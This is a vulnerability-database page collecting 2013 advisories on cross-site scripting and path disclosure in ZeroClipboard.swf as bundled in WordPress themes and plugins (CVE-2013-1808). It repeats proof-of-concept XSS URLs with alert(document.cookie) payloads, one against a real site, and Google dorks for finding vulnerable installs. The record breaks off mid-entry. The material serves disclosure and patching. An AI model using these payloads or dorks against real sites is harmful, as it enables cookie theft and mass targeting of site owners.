ZeroClipbord.swf Cross Site Scripting / Path Disclosure
2013-04-09T00:00:00
ID PACKETSTORM:121174 Type packetstorm Reporter MustLive Modified 2013-04-09T00:00:00
Description
`Hello list!
These are Cross-Site Scripting and Full path disclosure vulnerabilities in
multiple themes for WordPress (with ZeroClipboard.swf).
Earlier I've wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is very widespread flash-file and it's placed at tens of thousands
of web sites. And it's used in hundreds of web applications.
After publishing this and two other advisories related to ZeroClipboard in
February, I've published last month two new advisories (which I prepared in
February). About vulnerabilities in WP plugins and in WP themes (with
ZeroClipboard.swf).
This flash-file is used in hundreds of themes for WordPress (including
custom themes for different sites). Among them are Montezuma, Striking,
Couponpress, Azolla, Black and White. And there are many other vulnerable
themes for WP with ZeroClipboard.swf. Also there is one theme which also
contains ZeroClipboard10.swf.
SecurityVulns ID: 12910
CVE: CVE-2013-1808
-------------------------
Affected products:
-------------------------
Vulnerable are the next web applications (WordPress themes) with
ZeroClipboard:
All versions of Montezuma, Striking, Couponpress, Azolla, Black and White.
Both XSS vulnerabilities in ZeroClipboard are fixed in the last version
ZeroClipboard 1.1.7. All developers should update swf-file in their
software. I wrote about developers who begun fixing these vulnerabilities in
ZeroClipboard in their software
(http://seclists.org/fulldisclosure/2013/Mar/207).
----------
Details:
----------
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into buffer (as described
in previous advisory).
http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
This is very widespread flash-file (both versions), as you can find out via
Google dorks. If at searching by standard Goolge dork it's possible to find
tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then
at searching for themes for WordPress it's possible to find hundreds
thousand of sites with these flash-files.
inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in
February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now
more)
Full path disclosure (WASC-13):
All mentioned themes have FPD vulnerabilities in php-files (in index.php and
others), which is typically for WP themes.
http://site/wp-content/themes/montezuma/
http://site/wp-content/themes/striking/
http://site/wp-content/themes/couponpress/
http://site/wp-content/themes/azolla/
http://site/wp-content/themes/black-and-white/
------------
Timeline:
------------
2013.02.19 - after contacting with old and new developers of ZeroClipboard,
I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about
vulnerabilities in different web applications with ZeroClipboard to draw
more attention to this issue concerned with hundreds of web applications.
2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at
my site (http://websecurity.com.ua/6401/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
`
{"id": "PACKETSTORM:121174", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ZeroClipbord.swf Cross Site Scripting / Path Disclosure", "description": "", "published": "2013-04-09T00:00:00", "modified": "2013-04-09T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://packetstormsecurity.com/files/121174/ZeroClipbord.swf-Cross-Site-Scripting-Path-Disclosure.html", "reporter": "MustLive", "references": [], "cvelist": ["CVE-2013-1808"], "lastseen": "2016-12-05T22:19:43", "viewCount": 5, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2016-12-05T22:19:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1808"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29320", "SECURITYVULNS:DOC:29322", "SECURITYVULNS:DOC:29321"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:6747", "WPVDB-ID:6767", "WPVDB-ID:6750", "WPVDB-ID:6755", "WPVDB-ID:6769", "WPVDB-ID:6770", "WPVDB-ID:6751", "WPVDB-ID:6766", "WPVDB-ID:6756", "WPVDB-ID:6757"]}, {"type": "wpexploit", "idList": ["WPEX-ID:6760"]}, {"type": "zdt", "idList": ["1337DAY-ID-20641"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807349", "OPENVAS:1361412562310807348"]}, {"type": "freebsd", "idList": ["622E14B1-B40C-11E2-8441-00E0814CAB4E"]}, {"type": "nessus", "idList": ["JENKINS_1_514.NASL", "FREEBSD_PKG_622E14B1B40C11E2844100E0814CAB4E.NASL"]}], "modified": "2016-12-05T22:19:43", "rev": 2}, "vulnersScore": 4.2}, "sourceHref": "https://packetstormsecurity.com/files/download/121174/zcb-xss.txt", "sourceData": "`Hello list! \n \nThese are Cross-Site Scripting and Full path disclosure vulnerabilities in \nmultiple themes for WordPress (with ZeroClipboard.swf). \n \nEarlier I've wrote about Cross-Site Scripting vulnerabilities in \nZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote \nthat this is very widespread flash-file and it's placed at tens of thousands \nof web sites. And it's used in hundreds of web applications. \n \nAfter publishing this and two other advisories related to ZeroClipboard in \nFebruary, I've published last month two new advisories (which I prepared in \nFebruary). About vulnerabilities in WP plugins and in WP themes (with \nZeroClipboard.swf). \n \nThis flash-file is used in hundreds of themes for WordPress (including \ncustom themes for different sites). Among them are Montezuma, Striking, \nCouponpress, Azolla, Black and White. And there are many other vulnerable \nthemes for WP with ZeroClipboard.swf. Also there is one theme which also \ncontains ZeroClipboard10.swf. \n \nSecurityVulns ID: 12910 \nCVE: CVE-2013-1808 \n \n------------------------- \nAffected products: \n------------------------- \n \nVulnerable are the next web applications (WordPress themes) with \nZeroClipboard: \n \nAll versions of Montezuma, Striking, Couponpress, Azolla, Black and White. \n \nBoth XSS vulnerabilities in ZeroClipboard are fixed in the last version \nZeroClipboard 1.1.7. All developers should update swf-file in their \nsoftware. I wrote about developers who begun fixing these vulnerabilities in \nZeroClipboard in their software \n(http://seclists.org/fulldisclosure/2013/Mar/207). \n \n---------- \nDetails: \n---------- \n \nCross-Site Scripting (WASC-08): \n \nXSS via id parameter and XSS via copying payload into buffer (as described \nin previous advisory). \n \nhttp://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \n \nhttp://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \n \nhttp://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \n \nhttp://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \n \nhttp://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height \n \nThis is very widespread flash-file (both versions), as you can find out via \nGoogle dorks. If at searching by standard Goolge dork it's possible to find \ntens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then \nat searching for themes for WordPress it's possible to find hundreds \nthousand of sites with these flash-files. \n \ninurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in \nFebruary, now more) \nzeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now \nmore) \n \nFull path disclosure (WASC-13): \n \nAll mentioned themes have FPD vulnerabilities in php-files (in index.php and \nothers), which is typically for WP themes. \n \nhttp://site/wp-content/themes/montezuma/ \n \nhttp://site/wp-content/themes/striking/ \n \nhttp://site/wp-content/themes/couponpress/ \n \nhttp://site/wp-content/themes/azolla/ \n \nhttp://site/wp-content/themes/black-and-white/ \n \n------------ \nTimeline: \n------------ \n \n2013.02.19 - after contacting with old and new developers of ZeroClipboard, \nI disclosed vulnerabilities in ZeroClipboard to the lists. \n2013.02 - in February I wrote two additional advisories about \nvulnerabilities in different web applications with ZeroClipboard to draw \nmore attention to this issue concerned with hundreds of web applications. \n2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at \nmy site (http://websecurity.com.ua/6401/). \n \nBest wishes & regards, \nMustLive \nAdministrator of Websecurity web site \nhttp://websecurity.com.ua \n \n`\n"}
{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and ZeroClipboard10.swf in ZeroClipboard before 1.0.8, as used in em-shorty, RepRapCalculator, Fulcrum, Django, aCMS, and other products, allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this is might be the same vulnerability as CVE-2013-1463. If so, it is likely that CVE-2013-1463 will be REJECTed.", "edition": 5, "cvss3": {}, "published": "2013-04-02T03:23:00", "title": "CVE-2013-1808", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1808"], "modified": "2014-04-19T04:34:00", "cpe": ["cpe:/a:zeroclipboard_project:zeroclipboard:1.0.5", "cpe:/a:zeroclipboard_project:zeroclipboard:1.0.7"], "id": "CVE-2013-1808", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1808", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zeroclipboard_project:zeroclipboard:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:zeroclipboard_project:zeroclipboard:1.0.5:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-03-14T23:21:01", "description": "Cross-Site Scripting vulnerabilities in multiple plugins for WordPress (with ZeroClipboard.swf).", "edition": 2, "published": "2013-04-11T00:00:00", "type": "zdt", "title": "ZeroClipboard Wordpress plugin XSS / FPD Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1808"], "modified": "2013-04-11T00:00:00", "id": "1337DAY-ID-20641", "href": "https://0day.today/exploit/description/20641", "sourceData": "These are Cross-Site Scripting vulnerabilities in multiple plugins for WordPress (with ZeroClipboard.swf).\r\n\r\nEarlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications.\r\n\r\nAfter publishing this and two other advisories related to ZeroClipboard in February, I've published last month two new advisories (which I prepared in February). About vulnerabilities in WP plugins and in WP themes (with ZeroClipboard.swf).\r\n\r\nThis flash-file is used potentially in hundreds of plugins for WordPress. Among them are Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods powered by Cleeng and Cleeng Content Monetization. And there are many other vulnerable plugins for WP with ZeroClipboard.\r\n\r\nAfter February's publications I've made a pause, and meanwhile Henri Salo disclosed in Match multiple vulnerable WordPress plugins with this flash-file (http://seclists.org/oss-sec/2013/q1/613). This list contains many plugins, but this is not exhaustive list and I've found many other vulnerable plugins with ZeroClipboard (including those, which I mentioned bellow).\r\n\r\nSecurityVulns ID: 12910\r\nCVE: CVE-2013-1808\r\n\r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n\r\nVulnerable are the next web applications (WordPress plugins) with ZeroClipboard (checked in mentioned versions):\r\n\r\nFlash Gallery 1.7.2, Slidedeck2 (all Lite, Personal and Pro versions, fixed in version 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.\r\n\r\nBoth XSS vulnerabilities in ZeroClipboard are fixed in the last version ZeroClipboard 1.1.7. All developers should update swf-file in their software. I wrote about developers who begun fixing these vulnerabilities in ZeroClipboard in their software (http://seclists.org/fulldisclosure/2013/Mar/207).\r\n\r\n----------\r\nDetails:\r\n----------\r\n\r\nCross-Site Scripting (WASC-08):\r\n\r\nXSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).\r\n\r\n1 Flash Gallery:\r\n\r\nhttp://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nSlidedeck2 (all Lite, Personal and Pro versions):\r\n\r\nThe folder of the plugin can be called slidedeck2, slidedeck-2.0, slidedeck2-personal and slidedeck2-pro. It contains the files ZeroClipboard.swf and ZeroClipboard10.swf.\r\n\r\nhttp://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nhttp://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nWPClone:\r\n\r\nhttp://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nPayPal Digital Goods powered by Cleeng:\r\n\r\nhttp://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nCleeng Content Monetization:\r\n\r\nhttp://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nThis is very widespread flash-file (both versions), as you can find out via Google dorks. If at searching by standard Goolge dork it's possible to find tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then at searching for plugins for WordPress it's possible to find hundreds thousand of sites with these flash-files.\r\n\r\ninurl:zeroclipboard.swf inurl:/wp-content/plugins/ - about 224000 (in February, now more)\r\nzeroclipboard.swf inurl:/wp-content/plugins/ - about 338000 (in February, now more)\r\n\r\nFull path disclosure (WASC-13):\r\n\r\nAll mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes.\r\n\r\nhttp://site/wp-content/themes/montezuma/\r\n\r\nhttp://site/wp-content/themes/striking/\r\n\r\nhttp://site/wp-content/themes/couponpress/\r\n\r\nhttp://site/wp-content/themes/azolla/\r\n\r\nhttp://site/wp-content/themes/black-and-white/\r\n\r\n------------\r\nTimeline:\r\n------------\r\n2013.02.19 - after contacting with old and new developers of ZeroClipboard, I disclosed vulnerabilities in ZeroClipboard to the lists.\r\n2013.02 - in February I wrote two additional advisories about vulnerabilities in different web applications with ZeroClipboard to draw more attention to this issue concerned with hundreds of web applications.\r\n2013.03.15 - disclosed vulnerabilities in multiple plugins for WordPress at my site (http://websecurity.com.ua/6382/).\r\n\r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/20641"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "\r\nHello 3APA3A!\r\n \r\nIn February I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard and multiple web applications. This is additional information on this topic.\r\n \r\nXSS vulnerabilities in ZeroClipboard\r\nhttp://securityvulns.ru/docs29105.html\r\nXSS vulnerabilities in YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools for DataTables for jQuery\r\nhttp://securityvulns.ru/docs29104.html\r\nXSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS\r\nhttp://securityvulns.ru/docs29103.html\r\n \r\nSecurityVulns ID: 12910\r\nCVE: CVE-2013-1808\r\n \r\nDuring my conversation with old ZeroClipboard developer (Joseph Huckaby) and new developers (Jon Rohan and James Greene) last month, I've recommended them to prevent downloading of ZeroClipboard's files (swf and sources) from repository at Google code. To prevent spreading of vulnerable versions of software. After my second letter at 19th of February, Joseph agreed with me on this and gave full control for new developers to make necessary changes at http://code.google.com/p/zeroclipboard/. About added warnings and disallowing of downloads Joseph informed me and later James confirm it too.\r\n \r\nBut it was not sufficient enough, since I found that it was possible to download files directly from repository (and there are many web sites which are referencing on these files). So I've suggested Jon and James to completely prevent downloading of all vulnerable files from old repository. After my letters from 3rd, 16th and 24th of March, they at last did it and made complete closure of old repository.\r\n \r\nXSS vulnerabilities in zClip and other web applications.\r\n \r\nIn addition to all those web applications, which I've wrote earlier and hundreds of webapps on which I've referenced via google dorks, there are tens or hundreds additional vulnerable web applications with ZeroClipboard. These are such webapps, which have no swf of ZeroClipboard in their bundles, but referencing on it at their sites or in documentation. I have found many webapps with such approach (for different flash-files, like all those flash video players, about vulnerabilities in which I wrote) for last years and wrote about such case. E.g. in 2010 I've wrote about Blogumus - a WP-Cumulus fork for Blogger, where there was swf-file at the site, from which users can download last version or embed it from that site (like from CDN).\r\n \r\nThere are such web developers, like developers of zClip and many other web applications, which are not bundling vulnerable swf of ZeroClipboard, but they referencing to it in old repository and asking all users to manually download last version of swf-file from repository (i.e. last vulnerable version). I've wrote to zClip developers about it at 6th of March, but they just ignored it. So to protect all future users of zClip and any other similar software, which are referencing to old repository at Google Code (with vulnerable versions of ZeroClipboard), and to force a fix to all such software, it was needed to close old repository completely. And today ZeroClipboard developers have done it.\r\n \r\nXSS (WASC-08):\r\n \r\nFor zClip the path will be the next. XSS via id parameter and XSS via copying payload into clipboard (as described in my first advisory).\r\n \r\nhttp://path/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nAll versions of zClip are referencing to vulnerable versions of ZeroClipboard. So all current users of zClip (including developer of zClip at their site) are using vulnerable swf-files and have XSS vulnerabilities at their sites. But since today all future users of zClip are protected. After I've forced developers of ZeroClipboard, it will prevent spreading of vulnerable versions of swf-files and will protect future users of all software (like zClip) from downloading vulnerable versions of ZeroClipboard. From now all web developers and users need to download ZeroClipboard only from new repository (https://github.com/jonrohan/ZeroClipboard). Everyone who is using old versions of ZeroClipboard or software, which are bundled with old versions of it, needs to update to the last version 1.1.7 from new repository.\r\n \r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:DOC:29322", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29322", "title": "XSS vulnerabilities in ZeroClipboard and multiple web applications", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "\r\nHello 3APA3A!\r\n \r\nThese are Cross-Site Scripting vulnerabilities in multiple plugins for WordPress (with ZeroClipboard.swf).\r\n \r\nEarlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications.\r\n \r\nAfter publishing this and two other advisories related to ZeroClipboard in February, I've published last month two new advisories (which I prepared in February). About vulnerabilities in WP plugins and in WP themes (with ZeroClipboard.swf).\r\n \r\nThis flash-file is used potentially in hundreds of plugins for WordPress. Among them are Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods powered by Cleeng and Cleeng Content Monetization. And there are many other vulnerable plugins for WP with ZeroClipboard.\r\n \r\nAfter February's publications I've made a pause, and meanwhile Henri Salo disclosed in Match multiple vulnerable WordPress plugins with this flash-file (http://seclists.org/oss-sec/2013/q1/613). This list contains many plugins, but this is not exhaustive list and I've found many other vulnerable plugins with ZeroClipboard (including those, which I mentioned bellow).\r\n \r\nSecurityVulns ID: 12910\r\nCVE: CVE-2013-1808\r\n \r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n \r\nVulnerable are the next web applications (WordPress plugins) with ZeroClipboard (checked in mentioned versions):\r\n \r\nFlash Gallery 1.7.2, Slidedeck2 (all Lite, Personal and Pro versions, fixed in version 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.\r\n \r\nBoth XSS vulnerabilities in ZeroClipboard are fixed in the last version ZeroClipboard 1.1.7. All developers should update swf-file in their software. I wrote about developers who begun fixing these vulnerabilities in ZeroClipboard in their software (http://seclists.org/fulldisclosure/2013/Mar/207).\r\n\r\n----------\r\nDetails:\r\n----------\r\n \r\nCross-Site Scripting (WASC-08):\r\n \r\nXSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).\r\n \r\n1 Flash Gallery:\r\n \r\nhttp://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nSlidedeck2 (all Lite, Personal and Pro versions):\r\n \r\nThe folder of the plugin can be called slidedeck2, slidedeck-2.0, slidedeck2-personal and slidedeck2-pro. It contains the files ZeroClipboard.swf and ZeroClipboard10.swf.\r\n \r\nhttp://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n\r\nhttp://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nWPClone:\r\n \r\nhttp://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nPayPal Digital Goods powered by Cleeng:\r\n \r\nhttp://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nCleeng Content Monetization:\r\n \r\nhttp://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nThis is very widespread flash-file (both versions), as you can find out via Google dorks. If at searching by standard Goolge dork it's possible to find tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then at searching for plugins for WordPress it's possible to find hundreds thousand of sites with these flash-files.\r\n \r\ninurl:zeroclipboard.swf inurl:/wp-content/plugins/ - about 224000 (in February, now more)\r\nzeroclipboard.swf inurl:/wp-content/plugins/ - about 338000 (in February, now more)\r\n \r\n------------\r\nTimeline:\r\n------------\r\n \r\n2013.02.19 - after contacting with old and new developers of ZeroClipboard, I disclosed vulnerabilities in ZeroClipboard to the lists.\r\n2013.02 - in February I wrote two additional advisories about vulnerabilities in different web applications with ZeroClipboard to draw more attention to this issue concerned with hundreds of web applications.\r\n2013.03.15 - disclosed vulnerabilities in multiple plugins for WordPress at my site (http://websecurity.com.ua/6382/).\r\n \r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:DOC:29321", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29321", "title": "XSS vulnerabilities in ZeroClipboard in multiple plugins for WordPress", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "\r\nHello 3APA3A!\r\n \r\nThese are Cross-Site Scripting and Full path disclosure vulnerabilities in multiple themes for WordPress (with ZeroClipboard.swf).\r\n \r\nEarlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications.\r\n \r\nAfter publishing this and two other advisories related to ZeroClipboard in February, I've published last month two new advisories (which I prepared in February). About vulnerabilities in WP plugins and in WP themes (with ZeroClipboard.swf).\r\n \r\nThis flash-file is used in hundreds of themes for WordPress (including custom themes for different sites). Among them are Montezuma, Striking, Couponpress, Azolla, Black and White. And there are many other vulnerable themes for WP with ZeroClipboard.swf. Also there is one theme which also contains ZeroClipboard10.swf.\r\n \r\nSecurityVulns ID: 12910\r\nCVE: CVE-2013-1808\r\n \r\n-------------------------\r\nAffected products:\r\n-------------------------\r\n \r\nVulnerable are the next web applications (WordPress themes) with ZeroClipboard:\r\n \r\nAll versions of Montezuma, Striking, Couponpress, Azolla, Black and White.\r\n \r\nBoth XSS vulnerabilities in ZeroClipboard are fixed in the last version ZeroClipboard 1.1.7. All developers should update swf-file in their software. I wrote about developers who begun fixing these vulnerabilities in ZeroClipboard in their software (http://seclists.org/fulldisclosure/2013/Mar/207).\r\n\r\n----------\r\nDetails:\r\n----------\r\n \r\nCross-Site Scripting (WASC-08):\r\n \r\nXSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).\r\n \r\nhttp://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nhttp://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nhttp://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nhttp://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nhttp://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height\r\n \r\nThis is very widespread flash-file (both versions), as you can find out via Google dorks. If at searching by standard Goolge dork it's possible to find tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then at searching for themes for WordPress it's possible to find hundreds thousand of sites with these flash-files.\r\n \r\ninurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in February, now more)\r\nzeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now more)\r\n \r\nFull path disclosure (WASC-13):\r\n \r\nAll mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes.\r\n \r\nhttp://site/wp-content/themes/montezuma/\r\n \r\nhttp://site/wp-content/themes/striking/\r\n \r\nhttp://site/wp-content/themes/couponpress/\r\n \r\nhttp://site/wp-content/themes/azolla/\r\n \r\nhttp://site/wp-content/themes/black-and-white/\r\n \r\n------------\r\nTimeline:\r\n------------\r\n \r\n2013.02.19 - after contacting with old and new developers of ZeroClipboard, I disclosed vulnerabilities in ZeroClipboard to the lists.\r\n2013.02 - in February I wrote two additional advisories about vulnerabilities in different web applications with ZeroClipboard to draw more attention to this issue concerned with hundreds of web applications.\r\n2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at my site (http://websecurity.com.ua/6401/).\r\n \r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua\r\n", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:DOC:29320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29320", "title": "XSS and FPD vulnerabilities in ZeroClipboard in multiple themes for WordPress", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "wpexploit": [{"lastseen": "2020-06-29T19:23:14", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard\n", "modified": "2020-03-13T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPEX-ID:6760", "href": "", "type": "wpexploit", "title": "slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard", "sourceData": "/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2020-06-29T19:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - q2w3-inc-manager <= 2.3.1 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", 